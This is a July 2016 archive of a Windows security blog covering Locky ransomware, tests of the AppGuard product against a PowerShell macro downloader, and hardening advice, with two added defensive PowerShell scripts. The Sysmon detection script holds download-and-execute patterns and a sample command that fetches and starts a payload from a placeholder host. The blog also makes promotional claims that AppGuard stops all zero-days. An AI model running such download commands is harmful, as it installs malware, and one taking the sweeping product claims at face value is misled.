Monthly Archives: July 2016

Locky deployment methods just changed – Who cares?

30 July 2016

The post ‘Locky Dropper Now Comes Embedded in the Loader’, published July 28, 2016 in the ReaQta Security Blog, clearly shows that the cyber criminals continuously develop and improve their products. In the past, Locky downloaded the encryption program from a command & control server. In the latest version the encryption program is embedded in the email attachment as strings. The moment the victim runs the loader, the encryption program is extracted from the strings, written to the User Space and executed from there.

This is no rocket science; simply the application of well-known obfuscation methods to the latest Locky variant.

And, with AppGuard installed on top of the security stack, this new Locky variant represents no real danger.

In my opinion, the next generation endpoint protection solutions available on the market will all deal effectively with this sort of zero-day malware. The example of AppGuard shows: It is simply install and forget.

With this, we will gain valuable time for the right and important things like the implementation of Two-Factor Authentication or privileged account management, or the design of effective security procedures or user training. Unfortunately, the paradigm shift from prevention to detection prevents us from implementing and doing the right and important things. It’s time for a paradigm change…

Have a good weekend.

Webinar Digital Extortion: Will you pay the ransom?

27 July 2016

I attended the IBM Security Webinar “Digital Extortion: Will you pay the ransom?” this evening. Limor Kessem talked about the history of and the latest trends in ransomware. Robert Lelewski provided an overview of the means to guard against and to recover from ransomware attacks.

Robert Lelewski showed a really remarkable slide:

[Slide: Train users to beware of threats]

The message is simple: Your users are the first line of defense. User training is the most effective means of combating cyber-attacks.

For more details, see the IBM ransomware landing page.

Have a good day.

Ten things every Airman must know

23 July 2016

This was a really exciting week. I got lots of phishing and spear phishing mails. Attached to the spear phishing mails were Trojan downloaders disguised as invoices. All downloaders were programmed in JavaScript, and as always, the actual download commands and URLs were hidden in a haystack of JavaScript function definitions. And the scripts were all zero-days! It seems as if the cyber criminals are back from a relaxing holiday.

Yesterday evening, I started reading the Air Force Doctrine Document 3-12, Cyberspace Operations. The doctrine documents are definitely worth reading, in particular if one develops a cyber defense strategy for a company or a governmental organization. Appendix A states the 10 Commandments of Cyber Security which everyone should know:


APPENDIX A – TEN THINGS EVERY AIRMAN MUST KNOW

  1. The United States is vulnerable to cyberspace attacks by relentless adversaries attempting to infiltrate our networks at work and at home – millions of times a day, 24/7.
  2. Our adversaries plant malicious code, worms, botnets, and hooks in common websites, software, and hardware such as thumbdrives, printers, etc.
  3. Once implanted, this code begins to distort, destroy, and manipulate information, or “phone” it home. Certain code allows our adversaries to obtain higher levels of credentials to access highly sensitive information.
  4. The adversary attacks your computers at work and at home knowing you communicate with the Air Force network by email or by transferring information from one system to another.
  5. As cyber wingmen, you have a critical role in defending your networks, your information, your security, your teammates, and your country.
  6. You significantly decrease our adversaries’ access to our networks, critical Air Force information, and even your personal identity by taking simple action.
  7. Do not open attachments or click on links unless the email is digitally signed, or you can directly verify the source—even if it appears to be from someone you know.
  8. Do not connect any hardware or download any software, applications, music, or information onto our networks without approval.
  9. Encrypt sensitive but unclassified and/or critical information. Ask your computer security administrator for more information.
  10. Install the free Department of Defense anti-virus software on your home computer. Your computer security administrator can provide you with your free copy.

Gen Norton A. Schwartz, Chief of Staff, US Air Force

“Defending Our Networks and Our Country”


If your company hasn’t communicated the 10 Commandments of Cyber Security to the employees yet, just adapt the above rules and off you go!

Have a good weekend.

AppGuard is an important part of a comprehensive security stack

16 July 2016

In the past weeks I tried hard to get an idea of the capabilities of Blue Ridge Networks AppGuard. To be honest, I would not want to do without AppGuard anymore. AppGuard creates the really good feeling that, under certain conditions, many cyber-attacks are simply rendered ineffective.

AppGuard is a perfect means against all kinds of Trojans and downloaders, in particular zero-days. Characteristic of this kind of malware is that it directly drops a malicious program, or downloads one from the attacker’s server, and executes it afterwards. This includes e.g. most of the known ransomware.

The User Space and MemoryGuard concept blocks this kind of malware out of the box, provided that the User Space concept is not undermined by a user who permanently works with high privileges. If the user works with privileges that allow the Trojan to store files outside the User Space (e.g. in the Program Files or Windows directories, which are only writable with administrative rights), the concept no longer works.

It is strongly recommended to work with the least possible privileges under normal conditions. If higher privileges are needed, set up a separate account with the required privileges and supply the credentials of this account when UAC asks for them.

More advanced malware may try to use the UAC auto-elevation feature to acquire higher privileges and to compromise AppGuard. At the default UAC level, certain signed Windows binaries are elevated without a prompt for members of the Administrators group, and malware can abuse them to get its own code running elevated. To protect from auto-elevation attacks, set UAC to ‘Always notify me’, which forces a prompt on the secure desktop for every elevation. Note that auto-elevation only affects accounts in the Administrators group; a standard user account cannot auto-elevate at all, which is one more reason to follow the previous recommendation.

This works even in the case of a gaming computer, where e.g. WOW and TeamSpeak are heavily used. Why shouldn’t it work on a standard system?

In addition, it is strongly recommended to disable macro execution in all kinds of office software, e.g. Microsoft Office, OpenOffice or LibreOffice.
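As an added example that is not part of the original post and not code from Blue Ridge Networks, the following PowerShell script audits exactly this baseline: whether the current account is a standard user, whether UAC is at ‘Always notify me’, whether Office macros are disabled, and whether Defender real-time protection and SmartScreen are on. It assumes Windows 10 and Office 2016 (registry version key 16.0); the UAC and Office Trust Center registry locations are the documented ones, while the SmartScreen value name is taken from the Windows 10 builds of the time and may differ on later builds.

```powershell
# Added example, not code from the blog or from Blue Ridge Networks.
# Audits the baseline the post recommends: standard user, UAC 'Always notify',
# Office macros disabled, Defender real-time protection and SmartScreen on.
# Assumptions: Windows 10, Office 2016 (registry version key 16.0).

function Test-StandardUser {
    # S-1-5-32-544 is the local Administrators group. It is listed by
    # 'whoami /groups' even for a UAC-filtered (non-elevated) token, so this
    # reports group membership rather than just the current elevation state.
    -not [bool]((whoami /groups) -match 'S-1-5-32-544')
}

function Get-UacStatus {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $key
    # 'Always notify me' is ConsentPromptBehaviorAdmin = 2 with
    # PromptOnSecureDesktop = 1. The Windows default (5 / 1) auto-elevates
    # some signed Microsoft binaries without a prompt; 0 / 0 is 'Never notify'.
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        AlwaysNotify               = ($p.EnableLUA -eq 1 -and
                                      $p.ConsentPromptBehaviorAdmin -eq 2 -and
                                      $p.PromptOnSecureDesktop -eq 1)
    }
}

function Set-UacAlwaysNotify {
    # Writes the 'Always notify me' values; run this from an elevated prompt.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    Set-ItemProperty -Path $key -Name EnableLUA                  -Value 1 -Type DWord
    Set-ItemProperty -Path $key -Name ConsentPromptBehaviorAdmin -Value 2 -Type DWord
    Set-ItemProperty -Path $key -Name PromptOnSecureDesktop      -Value 1 -Type DWord
}

function Get-OfficeMacroStatus {
    param([string]$OfficeVersion = '16.0',
          [string[]]$Apps = @('Word', 'Excel', 'PowerPoint'))
    # VBAWarnings: 1 = enable all macros (dangerous), 2 = disable with
    # notification (Office default), 3 = disable except digitally signed,
    # 4 = disable all without notification. A value under Software\Policies
    # (Group Policy) overrides the Trust Center value under Software\Microsoft.
    foreach ($app in $Apps) {
        $sources = @(
            @{ Name = 'policy';       Path = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security" },
            @{ Name = 'trust center'; Path = "HKCU:\Software\Microsoft\Office\$OfficeVersion\$app\Security" }
        )
        $value = $null; $source = 'default'
        foreach ($s in $sources) {
            $v = (Get-ItemProperty -Path $s.Path -Name VBAWarnings -ErrorAction SilentlyContinue).VBAWarnings
            if ($null -ne $v) { $value = $v; $source = $s.Name; break }
        }
        if ($null -eq $value) { $value = 2 }   # no value stored means the Office default
        [pscustomobject]@{ App = $app; VBAWarnings = $value; Source = $source; MacrosBlocked = ($value -ge 2) }
    }
}

function Get-BaselineReport {
    # SmartScreen value names vary by Windows 10 build; 'Off' means disabled.
    $smartScreen = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' `
                    -Name SmartScreenEnabled -ErrorAction SilentlyContinue).SmartScreenEnabled
    [pscustomobject]@{
        StandardUser        = Test-StandardUser
        UacAlwaysNotify     = (Get-UacStatus).AlwaysNotify
        OfficeMacrosBlocked = -not [bool](Get-OfficeMacroStatus | Where-Object { -not $_.MacrosBlocked })
        DefenderRealTime    = (Get-MpComputerStatus).RealTimeProtectionEnabled
        SmartScreen         = $smartScreen
    }
}

Get-BaselineReport | Format-List
```

Run the audit from the normal (non-elevated) standard user session, because that is the account whose exposure matters; only Set-UacAlwaysNotify needs an elevated prompt, and the separate administrative account mentioned above is the one to use for it.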

MemoryGuard protects against all kinds of zero-day drive-by downloads, PUPs (potentially unwanted programs) and file-less malware.

[Figure: My comprehensive security stack]

AppGuard does not protect against any kind of password phishing attack. Although popular internet browsers block many malicious URLs through URL reputation, e.g. the SmartScreen Filter in Internet Explorer or Safe Browsing in Firefox, this will not protect in the case of zero-days, i.e. phishing sites that are not yet on the block lists.

To reduce the likelihood of credential theft, turn on Two-Factor Authentication (TFA) for as many of the internet services you use as possible. If TFA cannot be enabled, choose a strong, unique password and stay alert. In short:

User awareness is the foundation of the entire security stack!

To put it succinctly: the proposed security stack will dramatically reduce the risk of cyber-attacks. Blue Ridge Networks AppGuard is an important component of this stack, in particular for the protection against all kinds of zero-days.

Have a good weekend.

AppGuard successfully protects against PowerShell based zero-day malware

9 July 2016

To get a feel for the impact AppGuard has on daily operations I worked mainly on my test system in the past weeks. My test system is a six-year-old Dell Inspiron 1445 with 4 GB of RAM and a 240 GB SSD. The latest version of Windows 10 is deployed and all out-of-the-box Windows security options like Windows Defender and SmartScreen are activated.

I work with standard user rights; UAC is set to ‘Always notify me’. Macro protection for the office suite is set to ‘Disable all macros with notification’. AppGuard is installed on top of this security stack to protect from all kinds of zero-days.

The impact on my daily work is hardly noticeable. Standard malware is blocked either by Defender or by SmartScreen. Even the download of e.g. JavaScript based malware from malwr.com for test purposes is a challenging task.

AppGuard does a really good job in blocking the execution of all kinds of zero-day malware from user space. But how well does AppGuard work against somewhat more advanced malware?

I searched for a new PowerShell based malware on malwr.com and found Invoice_201604469.doc.

A check on VirusTotal showed that only 3 of 56 anti-malware products detected the file as malicious:

Antivirus    Result                     Update
Fortinet     WM/Poseket.A!tr.dldr       20160706
Qihoo-360    heur.macro.powershell.a    20160706
Symantec     W97M.Downloader            20160706

As always, the VBA project containing the AutoOpen macro is password protected. But LibreOffice does not honour the VBA project password and reveals a masterpiece of code:

[Figure: AutoOpen macro with PowerShell code]

I opened the document and followed the instructions to execute the AutoOpen macro.

[Figure: Invoice_201604469.doc]

The effect was enormous. AppGuard’s MemoryGuard blocked the execution of the PowerShell script and prevented the download of the payload 18293.exe:

[Figures: Blocked Program Message 1 and Blocked Program Message 2]

Thus the command shell wasn’t able to start the payload and Windows displayed the last error message:

[Figure: Windows error message]

MemoryGuard is a really charming concept, and it is available out of the box right after installation.
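For readers who want to see the blocked behaviour on a system that has only the Windows built-in tooling plus Sysmon, here is an added example that is not part of the original post and not code from Blue Ridge Networks. It runs two detection rules over Sysmon process-creation events (Event ID 1): an Office application spawning a script host whose command line carries download and execution indicators, which is what the Invoice_201604469.doc macro above does, and an executable or script being run from user-writable locations, which is the execution from User Space described in the post ‘Locky deployment methods just changed’. The sample events, the user name ‘alice’, the host name and the URL example.invalid are constructed; the live-log reader at the end needs Sysmon installed and typically an elevated prompt.

```powershell
# Added example, not code from the blog or from Blue Ridge Networks.
# Flags, in Sysmon process-creation events (Event ID 1), the two behaviours
# these posts describe: an Office macro launching PowerShell to fetch and run
# a payload, and an executable started from user-writable 'user space'.
# The sample events, the user name and the URL below are constructed.

$OfficeApps  = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE'
$ScriptHosts = 'powershell.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'rundll32.exe'
# Command-line fragments typical of macro-launched PowerShell downloaders.
$DownloadMarks = 'DownloadFile', 'DownloadString', 'Net.WebClient', 'Invoke-Expression',
                 'IEX ', '-enc', '-w hidden', '-WindowStyle Hidden', 'Start-Process'
# Locations a standard user can write to, hence where droppers stage payloads.
$UserSpace = '\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\|\\Windows\\Temp\\|\\ProgramData\\'

function Find-SuspiciousProcess {
    param([Parameter(ValueFromPipeline)] [psobject] $Record)
    process {
        $image   = [IO.Path]::GetFileName($Record.Image)
        $parent  = [IO.Path]::GetFileName($Record.ParentImage)
        $reasons = @()
        if ($OfficeApps -contains $parent -and $ScriptHosts -contains $image) {
            $reasons += "Office application $parent spawned script host $image"
        }
        if ($image -eq 'powershell.exe') {
            $hits = @($DownloadMarks | Where-Object { $Record.CommandLine -like "*$_*" })
            if ($hits.Count -gt 0) { $reasons += "PowerShell download/execution indicators: $($hits -join ', ')" }
        }
        if ($Record.Image -match $UserSpace) {
            $reasons += "Executable launched from user-writable location: $($Record.Image)"
        }
        elseif ($ScriptHosts -contains $image -and $Record.CommandLine -match $UserSpace) {
            $reasons += "Script host $image running content from a user-writable location"
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ Image = $Record.Image; Parent = $Record.ParentImage; User = $Record.User; Reasons = $reasons }
        }
    }
}

# Constructed sample events in the shape of Sysmon Event ID 1 data.
$SampleEvents = @(
    [pscustomobject]@{   # macro-launched downloader, like Invoice_201604469.doc
        ParentImage = 'C:\Program Files\Microsoft Office\Office16\WINWORD.EXE'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -w hidden -nop -c "(New-Object Net.WebClient).DownloadFile(''http://example.invalid/18293.exe'',''C:\Users\alice\AppData\Local\Temp\18293.exe''); Start-Process ''C:\Users\alice\AppData\Local\Temp\18293.exe''"'
        User        = 'HOST\alice'
    },
    [pscustomobject]@{   # payload dropped to and run from user space, Locky-style
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Users\alice\AppData\Local\Temp\18293.exe'
        CommandLine = '"C:\Users\alice\AppData\Local\Temp\18293.exe"'
        User        = 'HOST\alice'
    },
    [pscustomobject]@{   # JavaScript loader opened from the Downloads folder
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\wscript.exe'
        CommandLine = '"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Rechnung.js"'
        User        = 'HOST\alice'
    },
    [pscustomobject]@{   # benign: Word printing through the spooler shim
        ParentImage = 'C:\Program Files\Microsoft Office\Office16\WINWORD.EXE'
        Image       = 'C:\Windows\splwow64.exe'
        CommandLine = 'C:\Windows\splwow64.exe 12288'
        User        = 'HOST\alice'
    },
    [pscustomobject]@{   # benign: browser started from Program Files
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Program Files\Mozilla Firefox\firefox.exe'
        CommandLine = '"C:\Program Files\Mozilla Firefox\firefox.exe"'
        User        = 'HOST\alice'
    }
)

$SampleEvents | Find-SuspiciousProcess | Format-List

function Get-SysmonProcessEvents {
    # Reads live Sysmon Event ID 1 records into the same shape (needs Sysmon
    # installed and, typically, an elevated prompt to read its log).
    Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath '*[System[EventID=1]]' |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{ Image = $data.Image; CommandLine = $data.CommandLine; ParentImage = $data.ParentImage; User = $data.User }
        }
}
# Get-SysmonProcessEvents | Find-SuspiciousProcess | Format-List
```

Of the five constructed events, the first three are reported and the two benign ones are not: Word spawning splwow64.exe is a normal printing path and firefox.exe lives under Program Files. The ‘-enc’ fragment is deliberately loose (it also matches ‘-EncodedCommand’ and ‘-Encoding’), so on a real log the PowerShell rule is a triage signal that needs the parent-process context, not a verdict on its own.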

This concludes my tests. The experiments of the past weeks show that User Space and MemoryGuard are useful security features. They complete the Windows built-in security features, and provide additional protection, in particular in the case of zero-day malware.

Have a good weekend.

Windows 10 free update phase ends in July 2016

2 July 2016

It’s high time to migrate to Windows 10. The free upgrade phase ends on July 29, 2016, one year after the first release of the most secure Windows operating system ever.

Windows 10 is the best choice for home users and SMEs. The core Windows 10 OS with the integrated SmartScreen application and URL reputation check and Windows Defender already provides good security out of the box, at no additional cost.

With UAC set to ‘Always notify me’ and by rigorously refraining from working with administrative privileges all the time, a high security level is achieved with little impact on usability.

It’s time to get started!

Have a good weekend.